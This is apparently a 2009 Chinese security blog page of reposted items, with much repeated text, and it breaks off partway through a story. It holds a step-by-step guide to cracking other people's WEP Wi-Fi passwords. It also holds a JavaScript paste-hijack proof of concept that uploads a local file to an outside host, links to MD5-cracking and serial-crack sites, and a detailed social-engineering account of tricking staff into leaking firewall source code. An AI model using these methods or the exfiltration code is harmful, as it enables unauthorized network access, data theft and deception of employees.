Spoonwep2這個軟件。非常方便,能夠先掃瞄,再選擇,不用再輸入MAC,破解IV也是自動的,無須在命令行下輸入煩瑣的命令。
spoonwep2是在原來的版本基礎之上的更新之作,讓使用者可以更加方便的進行對無線網絡的掃瞄、抓包或者注入抓包,破解密碼。
互聯網上有很多基於BT3進行WEP密碼破解的教程,都是用的spoonwep2做的範例。而BT3中默認裝的是spoonwep,所以趕快升級吧,免得到時候版本不對搞的自己莫名其妙。
spoonwep2下載地址:
http://www.butian.org/security/software/protect/707.html
4、安裝
將U盤清空,把剛才的bt3final_usb.iso解開到U盤,大約780M,共兩個目錄/BOOT/和/BT3/
把spoonwep2.lzm解壓縮到U盤上,放到/BT3/modules/下面
打開BOOT目錄,運行bootinst.bat
有可能出錯提示要加 -f 參數,原因是系統把U盤認成了「本地磁盤」而非「可移動磁盤」。然後再運行bat,安裝就成功了。如果你的系統是把U盤認成「可移動磁盤」那就無須添加-f。
5、啟動
製作完啟動U盤之後,插入U盤,重啟,將BIOS設置成U盤啟動即可,我們就可以進入BT3系統了
首頁面有很多選項,我們選擇第一個"BT3 GRAPHICS MODE KDE" 就可以了,進去後,可以看到漂亮的黑色BACK TRACK的Linux系統桌面。
選擇無線網卡,選擇無線網卡,根據自己的選吧(實在不會都都試一下,看哪個能搜到信號就用哪個)驅動選normal,因為作為攻擊端,我們並不清楚對方WEP的密碼是多少,所以選unknown victim。選好後點下面的next。
進入「Victims Discovery」。點右邊LAUNCH,系統開始掃瞄周邊的無線網絡。
搜索信號完成後,會看到很多無線網絡(如果你沒搜到,不是網卡選擇錯誤就是附近沒人用無線網絡)選擇其中一個,在軟件下方會看到此AP的客戶端,選擇其中 DATA比較多的一台(因為我們是根據分析數據包來破解密碼的,所以數據包越多破解的速度越快)選擇後,如圖所示我們有4種攻擊方式,2種分析數據模式 (64位或者128位),都選擇好,點擊LAUNCH,等就可以了下圖右下角是破解成功的例子,紅色即為WEP密碼。
基本上DATA比較快的話,搜索大概15-20分鐘就會出密碼了,碰到對方下載那就更好了,如果對方在寫WORD,聊QQ的話。換一台吧!
下邊是命令行格式,估計很多朋友看不懂,只是留給需要的人,迫不及待的朋友請往下拉!
1、準備工作
一台電腦 或者 一台筆記本電腦
一塊無線網卡(或者筆記本內置無線網卡)
1G的U盤,Vmware,刻錄機三者有其一即可(推薦用U盤)
以下兩個列表分別是經過測試可用BT3進行破解無線網絡的無線網卡和筆記本,請大家對照一下,其實沒有你自己網卡的型號也無所謂,可以試一下,因為自己在電腦店打工,隨便拿了一台也沒管是啥型號的就破解成功了。汗一下~~~
筆記本型號
http://backtrack.offensive-security.com/index.php/HCL:Laptops
網卡型號
http://backtrack.offensive-security.com/index.php/HCL:Wireless
2、下載BT3或BT4
BT3全稱Back Track 3,這是一個linux環境的便攜系統,可以放到U盤或者光盤中啟動,對本身硬盤沒有影響,無需在本地安裝,現在已經有BT4的BETA版了,喜歡嘗鮮的朋友可以試一下
是圈內非常著名的黑客攻擊平台,說白了就是一個封裝好的Linux操作系統,內置大量的網絡安全檢測工具以及黑客破解軟件等。BT3因可以方便的破解無線網絡而出名,其中內置的spoonwep是一個非常強悍的圖形化破解WEP無線網絡密碼的工具。
官方網站
http://www.remote-exploit.org/
BT3, BT4下載地址鏈接
http://www.remote-exploit.org/backtrack_download.html
其中有ISO格式,U盤格式,還有虛擬機Vmware格式的,大家各取所需,這裡我用的是U盤版(工具比較全),為什麼?大家沒看到那個Extended麼?
3、下載Spoonwep2
Spoonwep2這個軟件。非常方便,能夠先掃瞄,再選擇,不用再輸入MAC,破解IV也是自動的,無須在命令行下輸入煩瑣的命令。
spoonwep2是在原來的版本基礎之上的更新之作,讓使用者可以更加方便的進行對無線網絡的掃瞄、抓包或者注入抓包,破解密碼。
互聯網上有很多基於BT3進行WEP密碼破解的教程,都是用的spoonwep2做的範例。而BT3中默認裝的是spoonwep,所以趕快升級吧,免得到時候版本不對搞的自己莫名其妙。
spoonwep2下載地址:
http://www.butian.org/security/software/protect/707.html
4、安裝
將U盤清空,把剛才的bt3final_usb.iso解開到U盤,大約780M,共兩個目錄/BOOT/和/BT3/
把spoonwep2.lzm解壓縮到U盤上,放到/BT3/modules/下面
打開BOOT目錄,運行bootinst.bat
有可能出錯提示要加 -f 參數,原因是系統把U盤認成了「本地磁盤」而非「可移動磁盤」。然後再運行bat,安裝就成功了。如果你的系統是把U盤認成「可移動磁盤」那就無須添加-f。
5、啟動
製作完啟動U盤之後,插入U盤,重啟,將BIOS設置成U盤啟動即可,我們就可以進入BT3系統了
首頁面有很多選項,我們選擇第一個"BT3 GRAPHICS MODE KDE" 就可以了,進去後,可以看到漂亮的黑色BACK TRACK的Linux系統桌面。
6、破解
如圖所示,在菜單欄中單擊即可啟動spoonwep2,或者在終端窗口裡輸入「spoonwep」,也能啟動選擇無線網卡,選擇無線網卡,根據自己的選吧(實在不會都都試一下,看哪個能搜到信號就用哪個)驅動選normal,因為作為攻擊端,我們並不清楚對方WEP的密碼是多少,所以選unknown victim。選好後點下面的next。
進入「Victims Discovery」。點右邊LAUNCH,系統開始掃瞄周邊的無線網絡。
基本上DATA比較快的話,搜索大概15-20分鐘就會出密碼了,碰到對方下載那就更好了,如果對方在寫WORD,聊QQ的話。換一台吧!
註: 本文轉載自網路 非原創
轉載自 紅客聯盟 原文2009年11月22日 星期日
ASUS best, HP worst for notebook reliability
也是一篇lag文
內容是國外筆電損壞率的統計調查分析,
樣本數三萬的樣子,
結論就如同標題一樣,
這也是另一種台灣之光嗎? (哈
名次如下囉:
1. Asus
2. Toshiba
3. Sony
4. Apple
5. Dell
6. Lenovo
7. Acer
8. Gateway
9. HP
有興趣的可以看一下原文,內容都是英文字就是了。
內容是國外筆電損壞率的統計調查分析,
樣本數三萬的樣子,
結論就如同標題一樣,
這也是另一種台灣之光嗎? (哈
名次如下囉:
1. Asus
2. Toshiba
3. Sony
4. Apple
5. Dell
6. Lenovo
7. Acer
8. Gateway
9. HP
有興趣的可以看一下原文,內容都是英文字就是了。
2009-11-17: Metasploit 3.3 Released!
Metasploit 3.3 Released!
情报有点旧了 ><"
大家都晓得这款软体相当知名
but 小弟是本身没使用过
但据说用过的都说好
希望能一直free下去~
欲下载、收看请前往 官方网站
2009年11月20日 星期五
南京銥迅發現微軟IE7.0 異常CSS導致內存破壞漏洞
原文如下:
發表時間:2009-11-20 12:39:26
1.漏洞介紹
在XHTML 1.0標準下,使用特殊構造的CSS樣式,在Internet Explorer 7.0 打開特定的網頁後,Internet Explorer 7.0將發生內存崩潰,EIP指針將訪問0x70613e5b附近的內存區域。如果將0x70613e5b附近覆蓋特殊的機器碼,就可以執行任意命令。
2.漏洞危害(危害等級高)
黑客如果將含有「漏洞利用程序的網頁」置於網站上,瀏覽過含有「漏洞利用程序的網頁」的客戶端將被運行特洛伊木馬。
3.通知途徑
已經向「國家漏洞庫」提交。
發表時間:2009-11-20 12:39:26
1.漏洞介紹
在XHTML 1.0標準下,使用特殊構造的CSS樣式,在Internet Explorer 7.0 打開特定的網頁後,Internet Explorer 7.0將發生內存崩潰,EIP指針將訪問0x70613e5b附近的內存區域。如果將0x70613e5b附近覆蓋特殊的機器碼,就可以執行任意命令。
2.漏洞危害(危害等級高)
黑客如果將含有「漏洞利用程序的網頁」置於網站上,瀏覽過含有「漏洞利用程序的網頁」的客戶端將被運行特洛伊木馬。
3.通知途徑
已經向「國家漏洞庫」提交。
註: 本文轉載自網路 非原創
轉載自 銥迅訊息 原文2009年11月19日 星期四
[IN]SECURE ISSUE 23 (November 2009)
知名安全雜誌( [IN] SECURE )新的一期已經發佈了
有興趣的讀者趕緊下載吧~
內容:
官網下載: 點擊下載 假使官網速度過慢 可嘗試本站下載
本站下載: part1 part2
有興趣的讀者趕緊下載吧~
內容:
- Microsoft's security patches year in review: A malware researcher's perspective
- A closer look at Red Condor Hosted Service
- Report: RSA Conference Europe 2009, London
- The U.S. Department of Homeland Security has a vision for stronger information security
- Q&A: Didier Stevens on malicious PDFs
- Protecting browsers, endpoints and enterprises against new Web-based attacks
- Mobile spam: An old challenge in a new guise
- Report: BruCON security conference, Brussels
- Study uncovers alarming password usage behavior
- Elevating email to an enterprise-class database application solution
- AND MORE!
本站下載: part1 part2
2009年11月9日 星期一
2009年11月5日 星期四
milw0rm 的站長去世了
Many of us have wondered where str0ke has been and why milw0rm has not
been updated in a good while. I recently was informed that str0ke has
been hospitalized due to a strange condition with his heart, which he
has had since he was a child.
Sadly....
I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.
We wish nothing but blessing to his wife and 4 children.
RIP str0ke 1974-04-29 - 2009-11-03 09:23
:o(
原文
R.I.P. ><"
Sadly....
I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.
We wish nothing but blessing to his wife and 4 children.
RIP str0ke 1974-04-29 - 2009-11-03 09:23
:o(
原文
R.I.P. ><"
2009年10月19日 星期一
Javascript Paste Keyboard Shortcuts Hijack
這樣的攻擊手段也算是極其無恥 猥瑣之極! 所以防禦措施一定要做好
首先說一下通過Javascript Paste Keyboard Shortcuts Hijack能做什麼???能夠讀取你本地機器任何文件! 沒錯!也就是說 你中了任何一個XSS 加上你按了粘貼快捷鍵後,你就有可能被別人讀取你機上任何的文件!
那到底是什麼回事呢? OK 我慢慢來說
首先 我們知道JS是無權限獲讀取你本地任何文件的... 那麼我們必須要讓用戶上傳自己的文件!
怎麼讓用戶上傳呢? 很簡單! 通過 <input type=file > 這樣就能讓用戶上傳文件了!
現在又一個問題是, input 為file的時候 value的值 不能用代碼set進去!必須要讓用戶自己填寫! 必須要通過人機交互!
其實說到這裡!聰明的你大致也應該明白怎麼回事! 接著說! 用戶不可能把自己的文件填寫上去提交給你看的吧?
沒錯~ 那麼 就等待用戶 進行快捷鍵粘貼的時候 哈哈~~說說步驟
1. 判斷是否 進行 ctrl + v
2. 替換粘貼板
3. 光標切換到 文件上傳
4. 善後工作就交給你了 ( 例如如何把上傳textbox透明化,當前頁面不會因表單提交而跳轉 )
IE7 下的 POC :
首先說一下通過Javascript Paste Keyboard Shortcuts Hijack能做什麼???能夠讀取你本地機器任何文件! 沒錯!也就是說 你中了任何一個XSS 加上你按了粘貼快捷鍵後,你就有可能被別人讀取你機上任何的文件!
那到底是什麼回事呢? OK 我慢慢來說
首先 我們知道JS是無權限獲讀取你本地任何文件的... 那麼我們必須要讓用戶上傳自己的文件!
怎麼讓用戶上傳呢? 很簡單! 通過 <input type=file > 這樣就能讓用戶上傳文件了!
現在又一個問題是, input 為file的時候 value的值 不能用代碼set進去!必須要讓用戶自己填寫! 必須要通過人機交互!
其實說到這裡!聰明的你大致也應該明白怎麼回事! 接著說! 用戶不可能把自己的文件填寫上去提交給你看的吧?
沒錯~ 那麼 就等待用戶 進行快捷鍵粘貼的時候 哈哈~~說說步驟
1. 判斷是否 進行 ctrl + v
2. 替換粘貼板
3. 光標切換到 文件上傳
4. 善後工作就交給你了 ( 例如如何把上傳textbox透明化,當前頁面不會因表單提交而跳轉 )
IE7 下的 POC :
<HTML> <HEAD> <TITLE> Javascript Paste Keyboard Shortcuts Hijack </TITLE> </HEAD> <body onkeydown="temp()"> <input> <form action="http://learnns.blogspot.com/" method=post name=s> <input id=kj_filehijack type=file name=fhijack> </form> <script> function temp() { if(event.ctrlKey){ if(event.keyCode==86){ window.clipboardData.setData("text","c:/boot.ini"); document.getElementById('kj_filehijack').focus(); document.s.submit(); } } } </script> </BODY> </HTML>
註: 本文轉載自網路 非原創
轉載自 QuantumIntelligence 原文分享免費/空間動態域名/網盤/IP代理
1,免費動態域名申請
http://www.3322.org 希網
http://comexe.cn/ 科邁
http://www.comexe.cn
http://www.oray.net/ 花生殼
http://www.meibu.com/ 每步
http://ddns.vier.com.cn/ vier
2.免費網盤
http://www.fs2you.com/zh-cn/ 一個相當不錯的免費網絡U盤
http://www.namipan.com/ 納米盤,單文件最大200M。
http://www.live-share.com/
http://www.hack86.com/ 永碩E盤
http://www.vdisk.cn/www/
http://webdisk.cech.com.cn/
http://www.divshare.com/
http://www.esnips.com/
http://www.mediafire.com/
http://www.box.net/
http://skydrive.live.com/
http://www.sharebig.com/
http://www.zupload.com允許上傳500m的文件,幾乎無時限
http://www.putfile.com允許上傳25m的文件
http://www.turboupload.com/允許上傳70m的文件
http://www.wirefiles.com/上傳50M文件
http://www.zshare.net/允許上傳100m的文件,
http://www.yousendit.com/上傳1G文件,保留7天,限制下載次數,可多線程,推薦
http://updownloadserver.com/可以上傳250M的文件,速度不錯
http://upload2.net/以上傳25M的文件,保存時間一年
http://storeandserve.com/可以上傳100M的文件,30天之內有人下載就會一直保留
http://www.ultrashare.net/可以上傳30M的文件,速度還可以
http://www.filefront.com/無限空間,速度比較理想,推薦
http://easy-sharing.com/上傳75M的文件,下載次數不限,30天
http://www.filefactory.com/upload/可以上傳1.5G的文件,保存30天
http://fileupyours.com/上傳200M文件,無限期保存,無限期下載
http://datapickup.com/上傳1.5G文件,保存7天
http://www.transferbigfiles.com/上傳1G文件,保存5天
http://www.megashares.com/上傳1.5G文件,無限制下載
http://ww3.sharebigfile.com/上傳300M文件,可以開多個線程無限制下載,非常好
http://www.spread-it.com/上傳500M文件,30天
http://www.filecache.de/
http://megaupload.com/cn/
http://cn.ziddu.com/
3.在線製作LOGO的網站
http://free.logomaker.cn
http://logo.chinaz.com/
http://www.igogo8.com/
http://jack.asprise.net/software/imggen/generate.php
http://www.feedforall.com/public/rss-graphic-tool.htm
4.漏洞在線查詢網站。
http://www.sebug.net/
5.MD5在線破解網站
http://www.cmd5.com/
http://www.xmd5.org/index_cn.htm
http://md5.rednoize.com/(英文)
6.進程在線查詢
http://www.pcpid.com/
http://www.processlib.net/
7.IP查詢
http://www.ip168.com/
http://members.3322.org/dyndns/getip
http://www.ip138.com/ip2city.asp
http://www.ip168.com/IpInfo.asp?sType=0
http://www.net.cn/static/customercare/yourIP.asp
8.代理查詢
http://www.ipbbs.com/
http://info.hustonline.net/index/proxyshow.aspx(教育網)
9.源碼MD5
http://www.seeknot.com/index.asp
10.程序員之家
http://www.pudn.com/
11.DLL和ocx在線查詢或下載
http://www.dllfile.com/
http://www.dlldump.com/
http://www.ocxdump.com/
12.多引擎免費殺毒網址
http://www.virustotal.com/en/indexf.html
http://virusscan.jotti.org/
http://scanner.virus.org/
http://virscan.org/
http://www.3ctime.cn/shadu/
13.破解碼序列號大全網站
http://www.cracks.am/
14.免費圖片存放
http://www.yupoo.com
15.在線文字圖片生成
http://www.funonit.com
http://www.text-image.com/
16,在線詞典
http://dict.cn/
http://www.dicon.cn/
http://www.iciba.com/
http://www.ourdict.cn/
http://deyu.ohdict.com/
http://www.mydict.com/
17,免費空間
http://fw4.99081.com 動態,無廣告,1G,web管理
http://www.5944.net/ 動態,有廣告,1G,ftp和web管理
http://www.3326.com/ 靜態,無廣告,100M,ftp和web管理
http://www.mianfei.la/ 動態,有廣告,1G ,FTP管理
http://www.tofor.com/ 動態,速度快,沒廣告,50M,FTP管理
18,防火牆測評
http://www.firewallleaktester.com/
http://www.matousec.com/
19,網頁設計(DIV+CSS XHTML模板站和素材)
http://www.oswd.org/
http://www.solucija.com/home/css-templates/
http://www.tristarwebdesign.co.uk/templates.html
http://www.sixshootermedia.com/free-templates/
http://www.openwebdesign.org/
http://www.theyear1986.com/
http://www.80diy.com/
http://www.w3cn.org/
http://www.w3csites.com/
大家看看吧!
http://www.3322.org 希網
http://comexe.cn/ 科邁
http://www.comexe.cn
http://www.oray.net/ 花生殼
http://www.meibu.com/ 每步
http://ddns.vier.com.cn/ vier
2.免費網盤
http://www.fs2you.com/zh-cn/ 一個相當不錯的免費網絡U盤
http://www.namipan.com/ 納米盤,單文件最大200M。
http://www.live-share.com/
http://www.hack86.com/ 永碩E盤
http://www.vdisk.cn/www/
http://webdisk.cech.com.cn/
http://www.divshare.com/
http://www.esnips.com/
http://www.mediafire.com/
http://www.box.net/
http://skydrive.live.com/
http://www.sharebig.com/
http://www.zupload.com允許上傳500m的文件,幾乎無時限
http://www.putfile.com允許上傳25m的文件
http://www.turboupload.com/允許上傳70m的文件
http://www.wirefiles.com/上傳50M文件
http://www.zshare.net/允許上傳100m的文件,
http://www.yousendit.com/上傳1G文件,保留7天,限制下載次數,可多線程,推薦
http://updownloadserver.com/可以上傳250M的文件,速度不錯
http://upload2.net/以上傳25M的文件,保存時間一年
http://storeandserve.com/可以上傳100M的文件,30天之內有人下載就會一直保留
http://www.ultrashare.net/可以上傳30M的文件,速度還可以
http://www.filefront.com/無限空間,速度比較理想,推薦
http://easy-sharing.com/上傳75M的文件,下載次數不限,30天
http://www.filefactory.com/upload/可以上傳1.5G的文件,保存30天
http://fileupyours.com/上傳200M文件,無限期保存,無限期下載
http://datapickup.com/上傳1.5G文件,保存7天
http://www.transferbigfiles.com/上傳1G文件,保存5天
http://www.megashares.com/上傳1.5G文件,無限制下載
http://ww3.sharebigfile.com/上傳300M文件,可以開多個線程無限制下載,非常好
http://www.spread-it.com/上傳500M文件,30天
http://www.filecache.de/
http://megaupload.com/cn/
http://cn.ziddu.com/
3.在線製作LOGO的網站
http://free.logomaker.cn
http://logo.chinaz.com/
http://www.igogo8.com/
http://jack.asprise.net/software/imggen/generate.php
http://www.feedforall.com/public/rss-graphic-tool.htm
4.漏洞在線查詢網站。
http://www.sebug.net/
5.MD5在線破解網站
http://www.cmd5.com/
http://www.xmd5.org/index_cn.htm
http://md5.rednoize.com/(英文)
6.進程在線查詢
http://www.pcpid.com/
http://www.processlib.net/
7.IP查詢
http://www.ip168.com/
http://members.3322.org/dyndns/getip
http://www.ip138.com/ip2city.asp
http://www.ip168.com/IpInfo.asp?sType=0
http://www.net.cn/static/customercare/yourIP.asp
8.代理查詢
http://www.ipbbs.com/
http://info.hustonline.net/index/proxyshow.aspx(教育網)
9.源碼MD5
http://www.seeknot.com/index.asp
10.程序員之家
http://www.pudn.com/
11.DLL和ocx在線查詢或下載
http://www.dllfile.com/
http://www.dlldump.com/
http://www.ocxdump.com/
12.多引擎免費殺毒網址
http://www.virustotal.com/en/indexf.html
http://virusscan.jotti.org/
http://scanner.virus.org/
http://virscan.org/
http://www.3ctime.cn/shadu/
13.破解碼序列號大全網站
http://www.cracks.am/
14.免費圖片存放
http://www.yupoo.com
15.在線文字圖片生成
http://www.funonit.com
http://www.text-image.com/
16,在線詞典
http://dict.cn/
http://www.dicon.cn/
http://www.iciba.com/
http://www.ourdict.cn/
http://deyu.ohdict.com/
http://www.mydict.com/
17,免費空間
http://fw4.99081.com 動態,無廣告,1G,web管理
http://www.5944.net/ 動態,有廣告,1G,ftp和web管理
http://www.3326.com/ 靜態,無廣告,100M,ftp和web管理
http://www.mianfei.la/ 動態,有廣告,1G ,FTP管理
http://www.tofor.com/ 動態,速度快,沒廣告,50M,FTP管理
18,防火牆測評
http://www.firewallleaktester.com/
http://www.matousec.com/
19,網頁設計(DIV+CSS XHTML模板站和素材)
http://www.oswd.org/
http://www.solucija.com/home/css-templates/
http://www.tristarwebdesign.co.uk/templates.html
http://www.sixshootermedia.com/free-templates/
http://www.openwebdesign.org/
http://www.theyear1986.com/
http://www.80diy.com/
http://www.w3cn.org/
http://www.w3csites.com/
註: 本文轉載自網路 非原創
這篇是朋友從某論壇丟過來的大家看看吧!
2009年10月18日 星期日
NOD32病毒庫自動更新代碼
最近nod32封殺了不少國內的發布免費ID的站點,使IP查找起來比較麻煩了,索性就用官方發佈的離線升級包弄個更新服務器,自己用。
官方離線升級包下載地址是:http://www.eset.com.cn/html/download/offline.shtml
用vc寫了段代碼,自動下載更新包並解壓至指定目錄,然後指定更新目錄為那個目錄就好了,建一個計劃任務,每天更新一次就實現自動更新了。
以下是簡單的代碼:
官方離線升級包下載地址是:http://www.eset.com.cn/html/download/offline.shtml
用vc寫了段代碼,自動下載更新包並解壓至指定目錄,然後指定更新目錄為那個目錄就好了,建一個計劃任務,每天更新一次就實現自動更新了。
以下是簡單的代碼:
// download.cpp : 定義控制台應用程序的入口點。 //code By:Neeao //http://Neeao.com #include "stdafx.h" #include <windows.h> #include <urlmon.h> #pragma comment(lib, "urlmon.lib") int _tmain(int argc, _TCHAR* argv[]) { HRESULT hr=URLDownloadToFile(NULL,"http://down1.eset.com.cn/eset/offlinev2.rar","d:\\offlinev2.rar",0,NULL); SHELLEXECUTEINFO ShExecInfo = {0}; ShExecInfo.cbSize = sizeof(SHELLEXECUTEINFO); ShExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS; ShExecInfo.hwnd = NULL; ShExecInfo.lpVerb = NULL; ShExecInfo.lpFile = "C:\\Program Files\\WinRAR\\RAR.exe"; //調用rar ShExecInfo.lpParameters = "e d:\\offlinev2.rar -o+ D:\\offlinev2\\"; //執行的命令 ShExecInfo.lpDirectory = NULL; ShExecInfo.nShow = SW_SHOW; ShExecInfo.hInstApp = NULL; ShellExecuteEx(&ShExecInfo); WaitForSingleObject(ShExecInfo.hProcess,INFINITE);//等解壓縮完畢繼續往下執行 return 0; }
註: 本文轉載自網路 非原創
轉載自 Neeao'sBlog 原文2009年10月17日 星期六
Google Wave security features
Like the overwhelming majority of Google's "products", Google Wave (a
real-time communication and collaboration tool) seems to be a really
handy and easy-to-use. Having said that, let us concentrate a moment on
its security aspects.
IT News reports that Greg D'Alesandre, the product manager of technology, explained that Wave has two features that make your "conversations" secure.
The first one makes sure that the information that travels from server to server can't be intercepted in the middle and "faked", because it comes integrated with authentication information that identifies the sending account.
The second one is the complete encryption of traffic via HTTPS in order to avoid packet sniffing. Users are not even given the option not to use it! Google has decided that in this instance security is more important than speed, and security experts around the world are probably applauding this decision and hoping that this is the beginning of a new way of thinking.
IT News reports that Greg D'Alesandre, the product manager of technology, explained that Wave has two features that make your "conversations" secure.
The first one makes sure that the information that travels from server to server can't be intercepted in the middle and "faked", because it comes integrated with authentication information that identifies the sending account.
The second one is the complete encryption of traffic via HTTPS in order to avoid packet sniffing. Users are not even given the option not to use it! Google has decided that in this instance security is more important than speed, and security experts around the world are probably applauding this decision and hoping that this is the beginning of a new way of thinking.
註: 本文轉載自網路 非原創
轉載自 Net-security 原文2009年10月16日 星期五
社工案例: 誰洩漏的防火牆源代碼?
前景分析:
22歲的劉昉在高中輟學後,先後做過食品銷售、商場員工、電子設備維護員等,這些經歷使得他精於與各式各樣的人打交道。但在接下來的5年,他瘋狂的迷上了 計算機,尤其對黑客技術感興趣,並涉足了地下黑客經濟。他接的業務很多,如對私服的DDOS、編寫針對性的網銀鍵盤記錄工具、遊戲裝備盜取洗錢等。
但劉昉對重複性攻擊感到厭倦,顯然,有刺激的事物往往令人更感興趣。這次,他盯上了一套防火牆,由北京中關村恆天公司研發。據說這套防火牆一公佈便在業界大受好評,劉昉則不以為然,在他看來,防火牆的源代碼才能說服他。
一、銷售部門的後門
劉昉從對外公佈的防火牆軟件中的菜單欄「幫助」處找到了恆天公司銷售部與市場部的聯繫電話,接著他
便以某公司採購部經理的身份撥通了恆天公司銷售部的電話。
恆天公司(以下簡稱恆):「您好,這裡是恆天公司銷售部」
劉漂陽(以下簡稱劉):「嗯,我是北京亞太機電股份有限公司採購部經理劉漂陽,我們公司需要500份防火牆軟件產品,我參考了網上的防火牆橫向評測,再三考慮後決定選擇你們的產品,現在我想知道你們給我的價格是否令人滿意。」
恆:「劉經理,我們的防火牆有三種不同的版本,分別為個人版、專業版和企業版。如果你選擇企業版,它的單價是88元,總價為4.4萬;如果你批發購買、那麼價格相對優惠,僅3.2萬。」
劉:「嗯,沒有高於我們公司原始估價,不過我們公司網絡環境相當複雜,你們公司是否可以定製一套,實現封堵公司員工聊天與下載的功能?」
恆:「這個……請讓我問問軟件開發部,請稍等。」
劉:「好的」
…………
恆:「久等了,技術員說了,防火牆自帶了過濾功能,只要過濾到相應端口就可以了。」
劉:「原來是這樣,我沒有問題了,但我們公司網絡管理員建議我把有關內部網絡的文檔發給你,讓你們技術員檢查防火牆的可行性。你有電腦嗎?我想現在就傳送給你,稍後我還有一個會議急需參加。」
恆:「有的,我的電子郵件是wenyu014@163.com,你現在就發過來?」
劉:「是的,等一下……(這位「劉漂陽」將一個文件夾與一個批處理文件打包並用郵箱發到指定的郵件
地址)我發過去了,一個壓縮包,你解壓到D盤,要放在D盤才能打開。」
恆:「嗯,解壓了,是那個「北京亞太機電有點股份公司局域網環境.bat」文件嗎?」
劉:「對,你可以查看下,看看是否可以打開,可以打開的話,你就發一份給你們技術員」
恆:「可以打開,只閃了一個黑窗口」
劉:「好的,三天後我給你答覆」
恆:「劉經理,再見!」
計劃很順利,劉昉成功利用社會工程學在恆天公司開啟了一個共享文件夾,文件夾以壓縮包的「WALL」命名,裡面包含了一個文件夾和批處理。不過批處理文件早已自刪除了,其作用就是開啟共享文件夾,並將另一個文件夾中的DOC文檔複製到當前目錄。
二、合作者的陰謀
防火牆源代碼是軟件公司的命根子,只有軟件開發人員才得以接觸,但劉昉對這些技術人員一無所知,他需要弄到一些基本信息,以及找一個可信的裡有。這次他以百度市場拓展部經理丁楠的身份撥通了恆天公司市場部的電話。
市場部:「您好,恆天公司市場部。」
丁楠:「我是百度拓展部經理丁楠,貴公司有合作的意向嗎?」
市場部:「百度?是在北京市北四環路58號理想大廈嗎?全球最大的搜索引擎?」
丁楠:「是的,我們公司計劃整合國內多家尖端軟件產品進行合作,以提升企業形象與影響力,目前國內有三家上市軟件公司參與,不知恆天公司……」
市場部:「我們恆天企業才運營半年,在業界也暫無廣泛的知名度,能與貴公司合作再好不過了,但合作的決定權不在我們市場部,這個需要內部討論才能再作商議。」
丁楠:「這樣吧,我給你們恆天公司5天的考慮時間在做決定,如何?」
市場部:「可以!可以!」
丁楠:「嗯,你是市場部的負責人嗎?」
市場部:「是的,市場部,車仁表」
丁楠:「那麼,車經理,我想瞭解恆天公司的大致情況,雖然我們李彥宏董事長早有此計劃,但我需要一些資料說服部分反對的股東,因此,麻煩提供你們公司整體 運營情況,如季度的銷售額,還有軟件開發人員的資料。關於合作事宜百度公司將於明早八點半開股東大會對此作出決定。」
市場部:「這麼快?好的,資料我如何發給你呢?」
丁楠:「發到我的郵箱吧「by1943@qq.com」,最後,我們明早9點聯繫你,如何?」
市場部:「可以的,謝謝!」
大概半小時後,劉昉很順利的拿到一份清晰的員工表格,看上去,資料來源於人力資源部。劉昉很確定,恆天公司的市場負責人一定被「合作」沖昏了大腦,竟然把公司財務損益都發過來了。
三、消失的100萬源代碼
很自然,劉昉花了幾分鐘社工到信息後,打算冒稱恆天公司市場部另一位負責人王坤,並撥通了恆天公司軟件研發部技術人員劉剛的電話。
劉剛:「哪位?」
王坤:「是軟件開發部的劉剛吧?我是市場部負責人王坤,你不久前知道了公司將與百度合作的情況吧?」
劉剛:「好像是吧,我不確定。」
王坤:「嗯,百度要投資我們,你所在的服務器工作站打不打算置換?有這個打算的話,我跟財務部小王交涉下」
劉剛:「換吧!換吧!最近機箱動不動就有怪聲(劉剛對工作站的機子似乎有極度的不滿,迫於企業資金緊張,他也就沒提起,現在是個好機會)」
王坤:「很好,你把源代碼放到咱們內網做個備份,以免丟失了。嗯,我特意在銷售部的機子開了個共享,你把源碼放上去,下午6點新機器從電腦城元送過來,機器裝好後在刪掉源碼。」
劉剛:「好的,但是源碼會不會洩漏出去了?(劉剛有些擔心。)」
王坤:「沒事,現在4點,再過兩小時你就刪掉,而且我們機子都在內網,何況不是還有咱的防火牆嗎?少擔心了,你要對你的防火牆信任!」
劉剛:「OK!知道了!」 劉剛掛掉了電話。
緊接著,劉昉再次撥通恆天公司銷售部的電話……
銷售部:「劉經理?」(一看到號碼,一下就認出來了。)
劉漂陽:「嗯,我是採購部的劉經理,我在途中想到一件事,所以打電話問一下。」
銷售部:「請說。」
劉:「我似乎發錯文件了,除了發給你網絡環境.bat之外,我還發送了其他文件,你檢查一下有沒有多餘的文件?」
銷售部:「好的,我查查,在D盤的WALL文件夾對吧?」
劉:「對」
銷售部:「嗯,在WALL文件夾裡的另一個文件夾包含了一些打不開的文件,你指的是這些嗎?」
劉:「對,能發給我嗎?那是我其他的採購項目表,需要相應的軟件才能打開。(劉經理很誠懇的解釋。)要是項目表丟了,我的工作也就丟了。」
銷售部:「這樣啊,不要緊,我馬上打包發到你郵箱裡。(接著是鍵盤的敲打聲……)我發過去了,劉經理,您打開郵箱看一下」
劉:「收到了,謝謝你了!」
銷售部:「嗯,沒問題的話我先掛了,劉先生,別忘了防火牆的採購!」
劉:「好的,再見!」
就這樣,撥打三次電話的劉昉搞定了防火牆源代碼,不過為什麼銷售部的人說打不開那些文件呢?很簡單,她沒有安裝編程軟件,所以打不開。雖有,劉昉用網名 「神秘小強」將全部的防火牆源代碼公佈在很多黑客論壇……第二天,門戶站報導了這一代碼洩漏事件,網警對此束手無策。
22歲的劉昉在高中輟學後,先後做過食品銷售、商場員工、電子設備維護員等,這些經歷使得他精於與各式各樣的人打交道。但在接下來的5年,他瘋狂的迷上了 計算機,尤其對黑客技術感興趣,並涉足了地下黑客經濟。他接的業務很多,如對私服的DDOS、編寫針對性的網銀鍵盤記錄工具、遊戲裝備盜取洗錢等。
但劉昉對重複性攻擊感到厭倦,顯然,有刺激的事物往往令人更感興趣。這次,他盯上了一套防火牆,由北京中關村恆天公司研發。據說這套防火牆一公佈便在業界大受好評,劉昉則不以為然,在他看來,防火牆的源代碼才能說服他。
一、銷售部門的後門
劉昉從對外公佈的防火牆軟件中的菜單欄「幫助」處找到了恆天公司銷售部與市場部的聯繫電話,接著他
便以某公司採購部經理的身份撥通了恆天公司銷售部的電話。
恆天公司(以下簡稱恆):「您好,這裡是恆天公司銷售部」
